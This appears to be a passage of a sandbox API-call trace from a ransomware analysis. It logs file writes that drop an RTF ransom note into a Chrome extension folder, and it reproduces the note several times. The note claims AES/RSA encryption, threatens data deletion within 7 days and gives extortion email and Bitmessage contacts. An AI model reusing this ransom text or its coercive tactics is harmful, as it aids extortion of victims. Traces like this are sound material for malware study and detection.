automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\np¬WøÖ37\x1c\rx\x0b\x80¯5\x8c\x9cû)'\x9cý\x0e\x0f3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0286.494] WriteFile (in: hFile=0x2f0, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.494] CloseHandle (hObject=0x2f0) returned 1 [0286.494] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\#readme_eman#.rtf")) returned 0xffffffff [0286.494] GetLastError () returned 0x2 [0286.494] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.495] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.495] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.495] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third 